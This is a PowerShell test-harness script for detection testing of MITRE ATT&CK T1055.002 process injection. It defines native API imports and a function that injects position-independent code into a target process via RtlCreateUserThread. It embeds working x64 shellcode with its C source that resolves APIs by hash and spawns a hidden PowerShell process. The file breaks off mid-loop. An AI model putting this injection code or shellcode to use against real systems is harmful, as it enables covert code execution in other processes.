TestHarnesses/T1055.002_PortableExecutableInjection/InvokeThread.ps1
if (-not ('AtomicTestHarnesses_T1055_002.ProcessNativeMethods' -as [Type])) { $TypeDef = @' using System; using System.Runtime.InteropServices; namespace AtomicTestHarnesses_T1055_002 { [Flags] public enum ProcessAccess { PROCESS_CREATE_THREAD = 0x00000002, // Required for: RtlCreateUserThread PROCESS_VM_OPERATION = 0x00000008, // Required for: VirtualAllocEx, VirtualProtectEx, WriteProcessMemory, RtlCreateUserThread PROCESS_VM_READ = 0x00000010, // Required for: RtlCreateUserThread PROCESS_VM_WRITE = 0x00000020, // Required for: VirtualProtectEx, RtlCreateUserThread PROCESS_QUERY_INFORMATION = 0x00000400, // Required for: RtlCreateUserThread PROCESS_ALL_ACCESS = 0x001FFFFF } public enum PageProtection { PAGE_READWRITE = 0x04, PAGE_EXECUTE_READ = 0x20, PAGE_EXECUTE_READWRITE = 0x40 } public class ProcessNativeMethods { [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenProcess( int processAccess, bool bInheritHandle, int processId); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool IsWow64Process( IntPtr hProcess, ref bool Wow64Process); [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr VirtualAllocEx( IntPtr hProcess, IntPtr lpAddress, uint dwSize, int flAllocationType, int flProtect); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool WriteProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, ref uint lpNumberOfBytesWritten); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool VirtualProtectEx( IntPtr hProcess, IntPtr lpAddress, uint dwSize, int flNewProtect, ref uint lpflOldProtect); [DllImport("ntdll.dll", SetLastError = true)] public static extern int RtlCreateUserThread( IntPtr ProcessHandle, IntPtr SecurityDescriptor, bool CreateSuspended, IntPtr StackZeroBits, IntPtr StackReserved, IntPtr StackCommit, IntPtr StartAddress, IntPtr StartParameter, ref IntPtr ThreadHandle, ref IntPtr ClientID); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool CloseHandle( IntPtr hObject); } } '@ Add-Type -TypeDefinition $TypeDef } function Invoke-ATHInjectedThread { <# .SYNOPSIS Test runner for "Portable Executable" process injection. Technique ID: T1055.002 (Process Injection: Portable Executable Injection) .DESCRIPTION Invoke-ATHInjectedThread injects position-independent code into a target process using the RtlCreateUserThread API. Despite the naming of the "Portable Executable Injection" technique, injection of a Portable Executable (PE) file is not necessary to conduct this technique. When Portable Executable are injected using this technique, they are built in a position-independent fashion that have a PE self-loading capability. Invoke-ATHInjectedThread is designed to only inject into 64-bit processes. .PARAMETER ProcessId Specifies the process ID of the target process that Invoke-ATHInjectedThread will inject into. If -ProcessId is not specified, Invoke-ATHInjectedThread will launch a notepad.exe process that it will inject code into. .PARAMETER ProcessAccessType Specifies the access rights to request of the target process in order to perform injection. Possible values are MinimumAccess and AllAccess. MinimumAccess requests the minimum set of access rights required to perform injection: PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION. AllAccess requests PROCESS_ALL_ACCESS for the target process. If -ProcessAccessType is not specified, MinimumAccess is used as the default value. .PARAMETER MemoryProtectionType Specifies the memory protection type of the injected code at time of execution. Possible values are ReadWriteExecute and ReadExecute. If -MemoryProtectionType is not specified, ReadWriteExecute is used as a default value. ReadWriteExecute is the most flexible option that would permit the execution of self-modifying position-independent code. ReadExecute is ideal when self-modifying code is not needed and the minimum set of permissions necessary to execute is desired. .PARAMETER PositionIndependentCodeBytes Specifies user-supplied position-independent code to inject into the target process. If -PositionIndependentCodeBytes is not specified, default template code will be used. The default template code is useful for confirming that the injected code executed successfully. .PARAMETER TestGuid Optionally, specify a test GUID value to use to override the generated test GUID behavior. .INPUTS System.Diagnostics.Process Invoke-ATHInjectedThread accepts the output of Get-Process. Only one Process object should be supplied to Invoke-ATHInjectedThread. Microsoft.Management.Infrastructure.CimInstance#root/cimv2/Win32_Process Invoke-ATHInjectedThread accepts the output of a Win32_Process WMI object via Get-CimInstance. .OUTPUTS PSObject Outputs an object consisting of relevant execution details. The following object properties may be populated: * TechniqueID - Specifies the relevant MITRE ATT&CK Technique ID. * TestSuccess - Will be set to True if it was determined that the technique executed successfully. Invoke-ATHInjectedThread can only confidently determine success when user-supplied position-independent code is not supplied via -PositionIndependentCodeBytes - i.e. the built-in template code is used. * TestGuid - Specifies the test GUID that was used for the test. * InjectedCodeBytes - Specifies a byte array consisting of the raw bytes that were injected into the target process. * InjectedCodeHash - SHA256 hash of the bytes injected into the target process. * SourceProcessId - Specifies the process ID of the process that performed the injection - i.e. the current PowerShell process. * SourceExecutablePath - Specifies the executable path of the process that performed the injection - i.e. the current PowerShell process. * SourceCommandLine - Specifies the command-line of the process that performed the injection - i.e. the current PowerShell process. * TargetProcessId - Specifies the process ID of the process that Invoke-ATHInjectedThread injects into. * TargetExecutablePath - Specifies the executable path of the process that Invoke-ATHInjectedThread injects into. * TargetCommandLine - Specifies the command-line of the process that Invoke-ATHInjectedThread injects into. * TargetProcessAccess - Specifies the process access rights requested of the target process. * TargetProcessAccessValue - Specifies the process access rights requested of the target process as a decimal value. * TargetBaseAddressHex - Specifies the base address of the memory that Invoke-ATHInjectedThread allocates in the target process. * TargetAllocationPageProtect - Specifies the memory page protection of the position-independent code in the target process at time of execution. Possible values are PAGE_EXECUTE_READ and PAGE_EXECUTE_READWRITE. * TargetAllocationPageProtectValue - Specifies the memory page protection of the position-independent code in the target process at time of execution as a decimal value. * TargetThreadId - Specifies the thread ID of the new thread that Invoke-ATHInjectedThread creates in the target process. * TargetChildProcessId - Specifies the process ID of the powershell.exe process that spawned as the result of the template position-independent code successfully executing. This property will only be populated by Invoke-ATHInjectedThread when an argument is supplied to -PositionIndependentCodeBytes by a user. * TargetChildProcessCommandLine - Specifies the command-line of the powershell.exe process that spawned as the result of the template position-independent code successfully executing. This property will only be populated by Invoke-ATHInjectedThread when an argument is supplied to -PositionIndependentCodeBytes by a user. .EXAMPLE Invoke-ATHInjectedThread Injects template code into a spawned notepad.exe process. .EXAMPLE Get-Process explorer | Invoke-ATHInjectedThread Injects template code into explorer.exe. .EXAMPLE Invoke-ATHInjectedThread -PositionIndependentCodeBytes @(0x90, 0x90, 0x90, 0xC3) Injects user-supplied position-independent code into a spawned notepad.exe process. .EXAMPLE Get-Process explorer | Invoke-ATHInjectedThread -PositionIndependentCodeBytes @(0x90, 0x90, 0x90, 0xC3) Injects user-supplied position-independent code into explorer.exe. .EXAMPLE Invoke-ATHInjectedThread -ProcessAccessType AllAccess Specifies PROCESS_ALL_ACCESS access to a spawned notepad.exe process that it injects template code into. .EXAMPLE Invoke-ATHInjectedThread -MemoryProtectionType ReadExecute Executes injected code from a PAGE_EXECUTE_READ page instead of using default PAGE_EXECUTE_READWRITE permissions. #> [CmdletBinding()] param ( [Parameter(ValueFromPipelineByPropertyName)] [Int32] [Alias('Id')] $ProcessId, [String] [ValidateSet('MinimumAccess', 'AllAccess')] $ProcessAccessType = 'MinimumAccess', [String] [ValidateSet('ReadWriteExecute', 'ReadExecute')] $MemoryProtectionType = 'ReadWriteExecute', [Byte[]] [ValidateNotNullOrEmpty()] $PositionIndependentCodeBytes, [Guid] $TestGuid = (New-Guid) ) #region Setup $TestGuidToUse = $TestGuid $TestSuccess = $null $SpawnedProcProcessId = $null $SpawnedProcCommandLine = $null # The following template code launches a PowerShell child process with the following command-line: # powershell.exe -nop -Command Write-Host AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA; Start-Sleep -Seconds 2; exit # The AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA guid is replaced dynamically based on $TestGuid and is used to validate the successful execution of the injected code in a safe fashion. # SHA256 Hash: E06AE84E0EACCCB32E8A09A664DA565E8A052D1CC9432DD5E0478470937BF5EA # VirusTotal: https://www.virustotal.com/gui/file/e06ae84e0eacccb32e8a09a664da565e8a052d1cc9432dd5e0478470937bf5ea/details # The code below was generated with the following C code that was compiled in a position-indepedent fashion: <# #define WIN32_LEAN_AND_MEAN #pragma warning( disable : 4201 ) // Disable warning about 'nameless struct/union' #include "GetProcAddressWithHash.h" #include "64BitHelper.h" #include <windows.h> #include <intrin.h> typedef BOOL(WINAPI* FuncCreateProcess) ( _In_opt_ LPCTSTR lpApplicationName, _Inout_opt_ LPTSTR lpCommandLine, _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, _In_ BOOL bInheritHandles, _In_ DWORD dwCreationFlags, _In_opt_ LPVOID lpEnvironment, _In_opt_ LPCTSTR lpCurrentDirectory, _In_ LPSTARTUPINFO lpStartupInfo, _Out_ LPPROCESS_INFORMATION lpProcessInformation ); typedef DWORD(WINAPI* FuncWaitForSingleObject) ( _In_ HANDLE hHandle, _In_ DWORD dwMilliseconds ); VOID Execute(VOID) { FuncCreateProcess MyCreateProcessA; FuncWaitForSingleObject MyWaitForSingleObject; STARTUPINFO StartupInfo; PROCESS_INFORMATION ProcessInformation; // Hardcoded C:\ path to powershell.exe was used to support injection into processes where %PATH% is not populated. // For the sake of simplicity, this is the most straightforward solution. char cmdline[] = { 'C', ':', '\\', 'W', 'I', 'N', 'D', 'O', 'W', 'S', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', 'P', 'o', 'w', 'e', 'r', 'S', 'h', 'e', 'l', 'l', '\\', 'v', '1', '.', '0', '\\', 'p', 'o', 'w', 'e', 'r', 's', 'h', 'e', 'l', 'l', '.', 'e', 'x', 'e', ' ', '-', 'n', 'o', 'p', ' ', '-', 'n', 'o', 'n', 'i', ' ', '-', 'C', 'o', 'm', 'm', 'a', 'n', 'd', ' ', 'W', 'r', 'i', 't', 'e', '-', 'H', 'o', 's', 't', ' ', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', '-', 'A', 'A', 'A', 'A', '-', 'A', 'A', 'A', 'A', '-', 'A', 'A', 'A', 'A', '-', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', ';', ' ', 'S', 't', 'a', 'r', 't', '-', 'S', 'l', 'e', 'e', 'p', ' ', '-', 'S', 'e', 'c', 'o', 'n', 'd', 's', ' ', '2', ';', ' ', 'e', 'x', 'i', 't', 0 }; SecureZeroMemory(&StartupInfo, sizeof(StartupInfo)); SecureZeroMemory(&ProcessInformation, sizeof(ProcessInformation)); #pragma warning( push ) #pragma warning( disable : 4055 ) // Ignore cast warnings MyCreateProcessA = (FuncCreateProcess)GetProcAddressWithHash(0x863FCC79); #pragma warning( pop ) StartupInfo.dwFlags = STARTF_USESHOWWINDOW; StartupInfo.wShowWindow = SW_HIDE; StartupInfo.cb = sizeof(StartupInfo); MyCreateProcessA( NULL, (LPTSTR)cmdline, NULL, NULL, FALSE, 0, NULL, NULL, &StartupInfo, &ProcessInformation ); } #> [Byte[]] $TemplatePositionIndependentCodeBytes = @( 0x48,0x83,0xEC,0x28,0xE8,0xB7,0x07,0x00,0x00,0x48,0x83,0xC4,0x28,0xC3,0xCC,0xCC, 0x89,0x4C,0x24,0x08,0x56,0x57,0x48,0x81,0xEC,0x88,0x00,0x00,0x00,0x65,0x48,0x8B, 0x04,0x25,0x60,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x48,0x48,0x8B,0x44,0x24,0x48, 0x48,0x8B,0x40,0x18,0x48,0x89,0x44,0x24,0x50,0x48,0x8B,0x44,0x24,0x50,0x48,0x8B, 0x40,0x10,0x48,0x89,0x44,0x24,0x58,0x48,0x8B,0x44,0x24,0x58,0x48,0x89,0x44,0x24, 0x28,0x48,0x8B,0x44,0x24,0x28,0x48,0x83,0x78,0x30,0x00,0x0F,0x84,0x35,0x02,0x00, 0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x48,0x8B,0x44,0x24,0x28,0x48,0x8B, 0x40,0x30,0x48,0x89,0x44,0x24,0x18,0x48,0x8D,0x44,0x24,0x70,0x48,0x8B,0x4C,0x24, 0x28,0x48,0x8B,0xF8,0x48,0x8D,0x71,0x58,0xB9,0x10,0x00,0x00,0x00,0xF3,0xA4,0x48, 0x8B,0x44,0x24,0x18,0x48,0x63,0x40,0x3C,0x48,0x8B,0x4C,0x24,0x18,0x48,0x03,0xC8, 0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x60,0xB8,0x08,0x00,0x00,0x00,0x48,0x6B,0xC0, 0x00,0x48,0x8B,0x4C,0x24,0x60,0x8B,0x84,0x01,0x88,0x00,0x00,0x00,0x89,0x44,0x24, 0x24,0x48,0x8B,0x44,0x24,0x28,0x48,0x8B,0x00,0x48,0x89,0x44,0x24,0x28,0x83,0x7C, 0x24,0x24,0x00,0x75,0x05,0xE9,0x77,0xFF,0xFF,0xFF,0xC7,0x04,0x24,0x00,0x00,0x00, 0x00,0xEB,0x08,0x8B,0x04,0x24,0xFF,0xC0,0x89,0x04,0x24,0x0F,0xB7,0x44,0x24,0x72, 0x39,0x04,0x24,0x73,0x60,0x8B,0x04,0x24,0x48,0x8B,0x4C,0x24,0x78,0x48,0x03,0xC8, 0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x10,0x8B,0x44,0x24,0x04,0xC1,0xE8,0x0D,0x8B, 0x4C,0x24,0x04,0xC1,0xE1,0x13,0x0B,0xC1,0x89,0x44,0x24,0x04,0x48,0x8B,0x44,0x24, 0x10,0x0F,0xBE,0x00,0x83,0xF8,0x61,0x7C,0x16,0x48,0x8B,0x44,0x24,0x10,0x0F,0xBE, 0x00,0x8B,0x4C,0x24,0x04,0x8D,0x44,0x01,0xE0,0x89,0x44,0x24,0x04,0xEB,0x14,0x48, 0x8B,0x44,0x24,0x10,0x0F,0xBE,0x00,0x8B,0x4C,0x24,0x04,0x03,0xC8,0x8B,0xC1,0x89, 0x44,0x24,0x04,0xEB,0x8E,0x8B,0x44,0x24,0x24,0x48,0x8B,0x4C,0x24,0x18,0x48,0x03, 0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x30,0x48,0x8B,0x44,0x24,0x30,0x8B,0x40, 0x18,0x89,0x44,0x24,0x38,0x48,0x8B,0x44,0x24,0x30,0x8B,0x40,0x20,0x48,0x8B,0x4C, 0x24,0x18,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x40,0xC7,0x04,0x24, 0x00,0x00,0x00,0x00,0xEB,0x08,0x8B,0x04,0x24,0xFF,0xC0,0x89,0x04,0x24,0x8B,0x44, 0x24,0x38,0x39,0x04,0x24,0x0F,0x83,0xE6,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00, 0x00,0x00,0x00,0x48,0x8B,0x44,0x24,0x40,0x8B,0x00,0x48,0x03,0x44,0x24,0x18,0x48, 0x89,0x44,0x24,0x68,0x48,0x8B,0x44,0x24,0x40,0x48,0x83,0xC0,0x04,0x48,0x89,0x44, 0x24,0x40,0x48,0x8B,0x44,0x24,0x68,0x48,0x89,0x44,0x24,0x10,0x8B,0x44,0x24,0x08, 0xC1,0xE8,0x0D,0x8B,0x4C,0x24,0x08,0xC1,0xE1,0x13,0x0B,0xC1,0x89,0x44,0x24,0x08, 0x48,0x8B,0x44,0x24,0x10,0x0F,0xBE,0x00,0x8B,0x4C,0x24,0x08,0x03,0xC8,0x8B,0xC1, 0x89,0x44,0x24,0x08,0x48,0x8B,0x44,0x24,0x10,0x48,0xFF,0xC0,0x48,0x89,0x44,0x24, 0x10,0x48,0x8B,0x44,0x24,0x10,0x0F,0xBE,0x40,0xFF,0x85,0xC0,0x75,0xBE,0x8B,0x44, 0x24,0x04,0x8B,0x4C,0x24,0x08,0x03,0xC8,0x8B,0xC1,0x89,0x44,0x24,0x08,0x8B,0x84, 0x24,0xA0,0x00,0x00,0x00,0x39,0x44,0x24,0x08,0x75,0x51,0x48,0x8B,0x44,0x24,0x30, 0x8B,0x40,0x24,0x48,0x8B,0x4C,0x24,0x18,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x8B,0x0C, 0x24,0xD1,0xE1,0x8B,0xC9,0x0F,0xB7,0x04,0x08,0x66,0x89,0x44,0x24,0x20,0x48,0x8B, 0x44,0x24,0x30,0x8B,0x40,0x1C,0x48,0x8B,0x4C,0x24,0x18,0x48,0x03,0xC8,0x48,0x8B, 0xC1,0x0F,0xB7,0x4C,0x24,0x20,0xC1,0xE1,0x02,0x48,0x63,0xC9,0x8B,0x04,0x08,0x48, 0x8B,0x4C,0x24,0x18,0x48,0x03,0xC8,0x48,0x8B,0xC1,0xEB,0x0C,0xE9,0x05,0xFF,0xFF, 0xFF,0xE9,0xBB,0xFD,0xFF,0xFF,0x33,0xC0,0x48,0x81,0xC4,0x88,0x00,0x00,0x00,0x5F, 0x5E,0xC3,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC, 0x48,0x81,0xEC,0x88,0x01,0x00,0x00,0xC6,0x44,0x24,0x50,0x43,0xC6,0x44,0x24,0x51, 0x3A,0xC6,0x44,0x24,0x52,0x5C,0xC6,0x44,0x24,0x53,0x57,0xC6,0x44,0x24,0x54,0x49, 0xC6,0x44,0x24,0x55,0x4E,0xC6,0x44,0x24,0x56,0x44,0xC6,0x44,0x24,0x57,0x4F,0xC6, 0x44,0x24,0x58,0x57,0xC6,0x44,0x24,0x59,0x53,0xC6,0x44,0x24,0x5A,0x5C,0xC6,0x44, 0x24,0x5B,0x53,0xC6,0x44,0x24,0x5C,0x79,0xC6,0x44,0x24,0x5D,0x73,0xC6,0x44,0x24, 0x5E,0x74,0xC6,0x44,0x24,0x5F,0x65,0xC6,0x44,0x24,0x60,0x6D,0xC6,0x44,0x24,0x61, 0x33,0xC6,0x44,0x24,0x62,0x32,0xC6,0x44,0x24,0x63,0x5C,0xC6,0x44,0x24,0x64,0x57, 0xC6,0x44,0x24,0x65,0x69,0xC6,0x44,0x24,0x66,0x6E,0xC6,0x44,0x24,0x67,0x64,0xC6, 0x44,0x24,0x68,0x6F,0xC6,0x44,0x24,0x69,0x77,0xC6,0x44,0x24,0x6A,0x73,0xC6,0x44, 0x24,0x6B,0x50,0xC6,0x44,0x24,0x6C,0x6F,0xC6,0x44,0x24,0x6D,0x77,0xC6,0x44,0x24, 0x6E,0x65,0xC6,0x44,0x24,0x6F,0x72,0xC6,0x44,0x24,0x70,0x53,0xC6,0x44,0x24,0x71, 0x68,0xC6,0x44,0x24,0x72,0x65,0xC6,0x44,0x24,0x73,0x6C,0xC6,0x44,0x24,0x74,0x6C, 0xC6,0x44,0x24,0x75,0x5C,0xC6,0x44,0x24,0x76,0x76,0xC6,0x44,0x24,0x77,0x31,0xC6, 0x44,0x24,0x78,0x2E,0xC6,0x44,0x24,0x79,0x30,0xC6,0x44,0x24,0x7A,0x5C,0xC6,0x44, 0x24,0x7B,0x70,0xC6,0x44,0x24,0x7C,0x6F,0xC6,0x44,0x24,0x7D,0x77,0xC6,0x44,0x24, 0x7E,0x65,0xC6,0x44,0x24,0x7F,0x72,0xC6,0x84,0x24,0x80,0x00,0x00,0x00,0x73,0xC6, 0x84,0x24,0x81,0x00,0x00,0x00,0x68,0xC6,0x84,0x24,0x82,0x00,0x00,0x00,0x65,0xC6, 0x84,0x24,0x83,0x00,0x00,0x00,0x6C,0xC6,0x84,0x24,0x84,0x00,0x00,0x00,0x6C,0xC6, 0x84,0x24,0x85,0x00,0x00,0x00,0x2E,0xC6,0x84,0x24,0x86,0x00,0x00,0x00,0x65,0xC6, 0x84,0x24,0x87,0x00,0x00,0x00,0x78,0xC6,0x84,0x24,0x88,0x00,0x00,0x00,0x65,0xC6, 0x84,0x24,0x89,0x00,0x00,0x00,0x20,0xC6,0x84,0x24,0x8A,0x00,0x00,0x00,0x2D,0xC6, 0x84,0x24,0x8B,0x00,0x00,0x00,0x6E,0xC6,0x84,0x24,0x8C,0x00,0x00,0x00,0x6F,0xC6, 0x84,0x24,0x8D,0x00,0x00,0x00,0x70,0xC6,0x84,0x24,0x8E,0x00,0x00,0x00,0x20,0xC6, 0x84,0x24,0x8F,0x00,0x00,0x00,0x2D,0xC6,0x84,0x24,0x90,0x00,0x00,0x00,0x6E,0xC6, 0x84,0x24,0x91,0x00,0x00,0x00,0x6F,0xC6,0x84,0x24,0x92,0x00,0x00,0x00,0x6E,0xC6, 0x84,0x24,0x93,0x00,0x00,0x00,0x69,0xC6,0x84,0x24,0x94,0x00,0x00,0x00,0x20,0xC6, 0x84,0x24,0x95,0x00,0x00,0x00,0x2D,0xC6,0x84,0x24,0x96,0x00,0x00,0x00,0x43,0xC6, 0x84,0x24,0x97,0x00,0x00,0x00,0x6F,0xC6,0x84,0x24,0x98,0x00,0x00,0x00,0x6D,0xC6, 0x84,0x24,0x99,0x00,0x00,0x00,0x6D,0xC6,0x84,0x24,0x9A,0x00,0x00,0x00,0x61,0xC6, 0x84,0x24,0x9B,0x00,0x00,0x00,0x6E,0xC6,0x84,0x24,0x9C,0x00,0x00,0x00,0x64,0xC6, 0x84,0x24,0x9D,0x00,0x00,0x00,0x20,0xC6,0x84,0x24,0x9E,0x00,0x00,0x00,0x57,0xC6, 0x84,0x24,0x9F,0x00,0x00,0x00,0x72,0xC6,0x84,0x24,0xA0,0x00,0x00,0x00,0x69,0xC6, 0x84,0x24,0xA1,0x00,0x00,0x00,0x74,0xC6,0x84,0x24,0xA2,0x00,0x00,0x00,0x65,0xC6, 0x84,0x24,0xA3,0x00,0x00,0x00,0x2D,0xC6,0x84,0x24,0xA4,0x00,0x00,0x00,0x48,0xC6, 0x84,0x24,0xA5,0x00,0x00,0x00,0x6F,0xC6,0x84,0x24,0xA6,0x00,0x00,0x00,0x73,0xC6, 0x84,0x24,0xA7,0x00,0x00,0x00,0x74,0xC6,0x84,0x24,0xA8,0x00,0x00,0x00,0x20,0xC6, 0x84,0x24,0xA9,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xAA,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xAB,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xAC,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xAD,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xAE,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xAF,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xB0,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xB1,0x00,0x00,0x00,0x2D,0xC6,0x84,0x24,0xB2,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xB3,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xB4,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xB5,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xB6,0x00,0x00,0x00,0x2D,0xC6, 0x84,0x24,0xB7,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xB8,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xB9,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xBA,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xBB,0x00,0x00,0x00,0x2D,0xC6,0x84,0x24,0xBC,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xBD,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xBE,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xBF,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xC0,0x00,0x00,0x00,0x2D,0xC6, 0x84,0x24,0xC1,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xC2,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xC3,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xC4,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xC5,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xC6,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xC7,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xC8,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xC9,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xCA,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xCB,0x00,0x00,0x00,0x41,0xC6,0x84,0x24,0xCC,0x00,0x00,0x00,0x41,0xC6, 0x84,0x24,0xCD,0x00,0x00,0x00,0x3B,0xC6,0x84,0x24,0xCE,0x00,0x00,0x00,0x20,0xC6, 0x84,0x24,0xCF,0x00,0x00,0x00,0x53,0xC6,0x84,0x24,0xD0,0x00,0x00,0x00,0x74,0xC6, 0x84,0x24,0xD1,0x00,0x00,0x00,0x61,0xC6,0x84,0x24,0xD2,0x00,0x00,0x00,0x72,0xC6, 0x84,0x24,0xD3,0x00,0x00,0x00,0x74,0xC6,0x84,0x24,0xD4,0x00,0x00,0x00,0x2D,0xC6, 0x84,0x24,0xD5,0x00,0x00,0x00,0x53,0xC6,0x84,0x24,0xD6,0x00,0x00,0x00,0x6C,0xC6, 0x84,0x24,0xD7,0x00,0x00,0x00,0x65,0xC6,0x84,0x24,0xD8,0x00,0x00,0x00,0x65,0xC6, 0x84,0x24,0xD9,0x00,0x00,0x00,0x70,0xC6,0x84,0x24,0xDA,0x00,0x00,0x00,0x20,0xC6, 0x84,0x24,0xDB,0x00,0x00,0x00,0x2D,0xC6,0x84,0x24,0xDC,0x00,0x00,0x00,0x53,0xC6, 0x84,0x24,0xDD,0x00,0x00,0x00,0x65,0xC6,0x84,0x24,0xDE,0x00,0x00,0x00,0x63,0xC6, 0x84,0x24,0xDF,0x00,0x00,0x00,0x6F,0xC6,0x84,0x24,0xE0,0x00,0x00,0x00,0x6E,0xC6, 0x84,0x24,0xE1,0x00,0x00,0x00,0x64,0xC6,0x84,0x24,0xE2,0x00,0x00,0x00,0x73,0xC6, 0x84,0x24,0xE3,0x00,0x00,0x00,0x20,0xC6,0x84,0x24,0xE4,0x00,0x00,0x00,0x32,0xC6, 0x84,0x24,0xE5,0x00,0x00,0x00,0x3B,0xC6,0x84,0x24,0xE6,0x00,0x00,0x00,0x20,0xC6, 0x84,0x24,0xE7,0x00,0x00,0x00,0x65,0xC6,0x84,0x24,0xE8,0x00,0x00,0x00,0x78,0xC6, 0x84,0x24,0xE9,0x00,0x00,0x00,0x69,0xC6,0x84,0x24,0xEA,0x00,0x00,0x00,0x74,0xC6, 0x84,0x24,0xEB,0x00,0x00,0x00,0x00,0xBA,0x68,0x00,0x00,0x00,0x48,0x8D,0x8C,0x24, 0x10,0x01,0x00,0x00,0xE8,0xC7,0x00,0x00,0x00,0xBA,0x18,0x00,0x00,0x00,0x48,0x8D, 0x8C,0x24,0xF8,0x00,0x00,0x00,0xE8,0xB5,0x00,0x00,0x00,0xB9,0x79,0xCC,0x3F,0x86, 0xE8,0xDB,0xF8,0xFF,0xFF,0x48,0x89,0x84,0x24,0xF0,0x00,0x00,0x00,0xC7,0x84,0x24, 0x4C,0x01,0x00,0x00,0x01,0x00,0x00,0x00,0x33,0xC0,0x66,0x89,0x84,0x24,0x50,0x01, 0x00,0x00,0xC7,0x84,0x24,0x10,0x01,0x00,0x00,0x68,0x00,0x00,0x00,0x48,0x8D,0x84, 0x24,0xF8,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x48,0x48,0x8D,0x84,0x24,0x10,0x01, 0x00,0x00,0x48,0x89,0x44,0x24,0x40,0x48,0xC7,0x44,0x24,0x38,0x00,0x00,0x00,0x00, 0x48,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00, 0x00,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x45,0x33,0xC9,0x45,0x33,0xC0,0x48, 0x8D,0x54,0x24,0x50,0x33,0xC9,0xFF,0x94,0x24,0xF0,0x00,0x00,0x00,0x48,0x81,0xC4, 0x88,0x01,0x00,0x00,0xC3,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC, 0x56,0x48,0x8B,0xF4,0x48,0x83,0xE4,0xF0,0x48,0x83,0xEC,0x20,0xE8,0xDF,0xFA,0xFF, 0xFF,0x48,0x8B,0xE6,0x5E,0xC3,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC, 0x48,0x89,0x54,0x24,0x10,0x48,0x89,0x4C,0x24,0x08,0x57,0x48,0x83,0xEC,0x10,0x48, 0x8B,0x44,0x24,0x20,0x48,0x89,0x04,0x24,0x48,0x8B,0x3C,0x24,0x33,0xC0,0x48,0x8B, 0x4C,0x24,0x28,0xF3,0xAA,0x48,0x8B,0x44,0x24,0x20,0x48,0x83,0xC4,0x10,0x5F,0xC3 ) # Offsets to the template GUID string in the above position-indepedent code [Int[]] $GUIDCharOffsets = @( 0x4F6,0x4FE,0x506,0x50E,0x516,0x51E,0x526,0x52E,0x536,0x53E,0x546,0x54E,0x556,0x55E,0x566,0x56E,0x576,0x57E,0x586,0x58E,0x596,0x59E,0x5A6,0x5AE,0x5B6,0x5BE,0x5C6,0x5CE,0x5D6,0x5DE,0x5E6,0x5EE,0x5F6,0x5FE,0x606,0x60E ) if ($PositionIndependentCodeBytes) { $PositionIndependentCode = $PositionIndependentCodeBytes } else { [Byte[]] $TestGuidChars = [Text.Encoding]::ASCII.GetBytes($TestGuid.Guid) # Replace the template GUID with the contents of $TestGuid for ($i = 0; $i -lt $GUIDCharOffsets.Length; $i++) { 